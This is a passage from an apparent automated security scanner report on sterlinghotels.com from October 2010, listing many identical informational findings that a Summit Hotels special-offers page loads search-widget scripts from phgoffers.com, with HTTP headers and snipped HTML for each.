
5.110. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104373948750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:27:17 GMT
Content-Length: 151030

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104373948750" type="text/javascript"></script>
...[SNIP]...

5.111. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110325823750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:37:12 GMT
Content-Length: 150974

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232110325823750" type="text/javascript"></script>
...[SNIP]...

5.112. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111341292500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:38:54 GMT
Content-Length: 151007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111341292500" type="text/javascript"></script>
...[SNIP]...

5.113. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113473011250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:27 GMT
Content-Length: 151023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113473011250" type="text/javascript"></script>
...[SNIP]...

5.114. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111814417500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:40 GMT
Content-Length: 151073

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111814417500" type="text/javascript"></script>
...[SNIP]...

5.115. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098976917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:18:17 GMT
Content-Length: 150937

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232098976917500" type="text/javascript"></script>
...[SNIP]...

5.116. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106495198750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:30:49 GMT
Content-Length: 151098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232106495198750" type="text/javascript"></script>
...[SNIP]...

5.117. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111691917500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:28 GMT
Content-Length: 151007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111691917500" type="text/javascript"></script>
...[SNIP]...

5.118. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113315511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:42:11 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232113315511250" type="text/javascript"></script>
...[SNIP]...

5.119. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112044730000

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:40:04 GMT
Content-Length: 151064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112044730000" type="text/javascript"></script>
...[SNIP]...

5.120. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105439886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:29:03 GMT
Content-Length: 151043

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232105439886250" type="text/javascript"></script>
...[SNIP]...

5.121. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104034886250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:26:43 GMT
Content-Length: 151072

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232104034886250" type="text/javascript"></script>
...[SNIP]...

5.122. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116246136250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:47:03 GMT
Content-Length: 296009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116246136250" type="text/javascript"></script>
...[SNIP]...

5.123. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111403323750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:38:59 GMT
Content-Length: 151007

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111403323750" type="text/javascript"></script>
...[SNIP]...

5.124. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232798391917500

Request

GET /summit/special_offers/special_search_results.aspx HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sterlinghotels.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 388440
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w2teyhi5z0fyorbhfntc1z3u; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 21:43:58 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232798391917500" type="text/javascript"></script>
...[SNIP]...

5.125. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116090198750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:48 GMT
Content-Length: 296015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116090198750" type="text/javascript"></script>
...[SNIP]...

5.126. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116136761250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:46:52 GMT
Content-Length: 151001

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232116136761250" type="text/javascript"></script>
...[SNIP]...

5.127. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111723792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:39:31 GMT
Content-Length: 151023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232111723792500" type="text/javascript"></script>
...[SNIP]...

5.128. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112348948750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:40:34 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232112348948750" type="text/javascript"></script>
...[SNIP]...

5.129. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107783792500

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:32:57 GMT
Content-Length: 150980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107783792500" type="text/javascript"></script>
...[SNIP]...

5.130. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109420823750

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:35:42 GMT
Content-Length: 151036

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232109420823750" type="text/javascript"></script>
...[SNIP]...

5.131. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107015511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Oct 2010 02:31:41 GMT
Content-Length: 151047

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Summit Hotels & Resorts - Special Offers
</title><link rel="stylesheet
...[SNIP]...
<link rel="stylesheet" type="text/css" href="../css/slider.css" />
<script type="text/javascript" src="http://phgoffers.com/widgets/SearchWidget/prototype.js"></script>
...[SNIP]...
<td align="center" valign="top">
<script src="http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232107015511250" type="text/javascript"></script>
...[SNIP]...

5.132. http://www.sterlinghotels.com/summit/special_offers/special_search_results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sterlinghotels.com
Path:	/summit/special_offers/special_search_results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://phgoffers.com/widgets/SearchWidget/prototype.js
http://phgoffers.com/widgets/SearchWidget/searchwidget.js.ashx?brand=XL&skipjquery=true&time=634232101620511250

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
